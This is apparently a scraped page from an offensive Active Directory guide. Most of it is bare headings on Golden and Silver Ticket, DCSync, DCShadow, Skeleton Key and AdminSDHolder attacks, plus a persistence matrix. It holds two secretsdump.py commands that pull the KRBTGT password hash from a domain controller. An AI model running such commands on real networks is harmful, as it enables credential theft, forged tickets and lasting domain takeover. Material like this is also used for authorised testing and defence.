Advanced AD Attacks
Golden Ticket Attacks
KRBTGT Service Overview
Golden Ticket Attack
# Extract KRBTGT hash from domain controller
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc-user krbtgt
# Using NTLM hash authentication
python3 secretsdump.py -hashes :<NTLM-hash> <domain>/<username>@<DC-IP> -just-dc-user krbtgtSilver Ticket Attacks
Service Principal Names (SPN) Overview
Silver Ticket Attack
DCSync Attacks
Directory Replication Service (DRS) Overview
DCSync Attack
DCShadow Attacks
Domain Controller Registration Overview
DCShadow Attack
Skeleton Key Attacks
Local Security Authority (LSA) Overview
Skeleton Key Attack
AdminSDHolder Abuse
AdminSDHolder Mechanism Overview
AdminSDHolder Abuse Attack
Integrated Advanced Attack Strategy
Progressive Domain Compromise
Attack Persistence Matrix
Attack Type
Persistence Duration
Detection Difficulty
Access Scope
Tool Options
Critical Success Indicators
Last updated
Was this helpful?